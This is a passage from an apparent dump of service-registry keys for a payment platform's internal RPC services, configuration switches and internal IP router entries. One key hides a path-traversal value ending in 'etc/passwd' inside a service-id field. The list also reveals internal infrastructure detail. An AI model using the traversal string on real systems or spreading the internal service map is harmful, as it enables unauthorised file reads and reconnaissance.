EFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:mobilepayfront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_USERPRIVILEGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilebc.common.service.facade.applepay.api.ApplePayNotificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.asset.api.InsAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.lifecycle.mayibank.RegistrationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.home.rpc.facade.CommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimdecision.common.service.InsEdgeDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdKeyConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sffcore.MngSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zcache.tbase.ipaySecurePasswordTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.livekit.api.LiveVideoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_INSTRISKCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cdl.digital.logistic.business.rpc.DLBusinessOpProvider:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:creditutcoreExternalAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.55.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilechat.common.service.facade.api.ChatMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.share.RiskQuestionDealFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchanttrade.common.service.facade.api.PayChannelOprDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insliveprod.common.service.facade.growth.MedalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.cashier.common.service.facade.api.ServiceInstInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:developertool_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.struct.OraExpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.asset.AssetChangeCommitFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ldprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.security.verity.MrmUserRoleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.130.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbcraftsman.common.facade.alsc.ShopReserveInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.ManagerAPIService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pointcore.common.service.facade.RefundService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:aliinvoiceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:personalweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.miniselfop.facade.api.selfopact.SelfOpActQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdatacenter.service.facade.hpa.ActivityPortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.gift.DischargeInsuranceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.184.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodswitch.biz.service.template.SwitchHandlerTemplate:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.UserCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.security.facade.maintenance.MaintenanceService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-F-TRANSDATA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.zmxy.zmmccore.merchant.service.facade.MerchantMetaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.addpLoadtestTairRz.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linepay.common.serivce.facade.mng.order.PaymentOrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ifim.biz.risk.manager.RiskRuleManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.MrchProdQueryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.zskynet.zskynetDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.UserTagQueryService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskSourceQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.YouthResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.manager.facade.SecuritySandboxBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.template.ViewTemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alplan.service.facade.FinancePlanTraceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.facade.applet.RcSmartAppletFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cssocial.common.service.facade.YqMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cloud.acsellcore.common.service.facade.contract.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.v2.MerchantCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.chaos.dig.facade.recordpool.AttackRecordPoolMeasureFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testmeshend.facade.ServiceOfControlMode3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodmngcore.cloudservice.facade.AccessInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.CommoditiesTransferOrderLmyhRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.shop.ShopInfoReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.elastic.etetestcore.etetestcoreDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imif.common.service.facade.api.MerchantCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.device.admin.DeviceAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.aldata.common.service.facade.api.SpvInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finscene.common.service.facade.api.StrategyRecFacadeV2:1.0:finscene-surge113557@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.zpublishuiweb_remote_slave_ds_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdsmng.common.service.facade.datalink.DataLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.biz.service.mcard.notify.SummaryAccountNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprocess.sip.action.Action:1.0:infosecContentPunishAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.zcache.tbase.bankcardTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.ebppCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filefactory.service.facade.FilePlatformBufferService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchToUtpResource.puregwFeatures,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.173.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchstm.common.service.facade.mart.facade.ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditpay.query.PcreditCheckQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_COLLECTCORE_TEST_SCRIPT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.apshopcenter.common.service.facade.BrandOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.store.external.facade.StoreExternalGzFacade:1.0:${app_name_store_external_gz_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_BUDGET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.integration.chngservice.proto.sync.OpsChangeSyncService:1.0:opscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.orderfront.common.service.facade.SalesProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacportal.common.service.integration.imerchprod.MerchantCaseOperateFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.dependence.DependenceGraphOpenOperatorService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbpromocore.common.service.facade.CampConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.migrate.JiebeiMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.biz.facade.api.TeamQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@alipaymember#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.50.26.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundcardprod.common.service.prepay.facade.management.api.BalanceQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.manage.KbdishCookManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.forexprod.common.service.facade.ForexBillCallBackWService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.mextitemcenter.common.facade.api.GlobalSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lisa.data.hub.facade.LisaDataHubAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.variable.facade.VariableCompileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.70.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:publichomeFCProcess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.paramcenter.ParamCenterConfigOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectprod.biz.service.schudeler.SyncAppInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilefun.common.service.facade.QueryIsvBindingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_CONTROL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_O_DPL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.SecurityProductApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findefencecore.common.service.script.api.ScriptTreeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.DataGrabFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.biz.service.webspi.controller.KbAlscCatePropertyQueryWarpperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.apply.MiniLoanApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@giftprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:..��..��..��..��..��..��..��..��etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.operation.OperationPropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.199.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:merchantsettle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.rfm.asset.service.RfmAssetStatisticQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.46.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_M_SETTLE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insapportion.apportion.service.UserApportionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecommunity.album.AlbumCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csisop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insdataprod:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsapiDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.facade.api.JiuzhouReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:iconfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.market.seller.OrderManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootrpcservertwo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.yunfengdieweb:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.cds.facade.YuemaProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.rule.api.RuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ApBillOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_G_RISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.common.service.integration.mobilegw.QueryAppInfoWithBackupClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.navigator.UserNavManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.service.facade.CreateAndPayCallBackFacade:1.0:mcomment@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.AmountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.OssFileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.client.drm.TairToTbaseSwitch.tbaseRouteGrayMethodsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:innersource-community@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ap.acquirefront.service.facade.api.AcquireOAuthApplyTokenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.common.quickaccess.facade.service.open.OpenServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_ITEM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_IACC_DAILY_CUT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iotcore.admin.LimitConfigAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:tradeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dcepcoin.common.service.facade.api.CoinQuotaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancenter.common.service.facade.FinancingStockPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.zcache.tbase.finfocoreRzoneTair_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.acsellcore.common.service.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.spi.RobotCallBackSPI:1.0:gfcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.reloadRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.solution.ProductSolutionQueryFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_HYP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecmng.push.SendMsgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.tuition.tr.TuitionSchoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.alive.api.ALiveMarkQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.crowd.CrowdRuleRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanapply.facade.loanapply.service.LoanApplyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insunderwritingcore.common.service.EndorsementUnderwritingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.rest.jenkins.JenkinsDataService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.198.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_CLEARING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.zoloz.zhub.bis.FacePayManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mctlib.common.facade.dataview.map.MerchantMapDataServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.165.169.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.operator.common.service.facade.AuthorizationVerifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.service.PcreditBillScheduleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.OutPlatformTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.codec.BatchCodeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.SvRankQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.dynamicview.ViewCustomWidgetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcsc.common.service.facade.insurance.InsuranceRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dpc.dasbi.common.service.facade.metric.MetricAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.monitor.ScheduleMonitorApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.source.doom.DoomAppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.AsynTaskGetManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.optimus.facade.dynamodule.DynaModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.96.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ipromofront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.dal.logsim.obtest.OeEmulatorTestRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.insautobff.chair.Config.commonCacheVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.zappinfo_dds_oss_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.credible.CredibleMacService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.234.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:iotcmgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.ProcessFlowAccessor:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcustsrv.facade.pcdecision.api.PcreditEasyMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.dal.tablestore.TableStoreConnectionClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:mrchprod_deleteShopMccProfile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.transaction.EncashTransListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeSubscribeShopPidStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.26.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gmodelcenter.common.service.api.standard.index.RiskCategoryIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alipaypointmc.common.service.facade.api.card.PointCardCreateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityShopBatchProcessH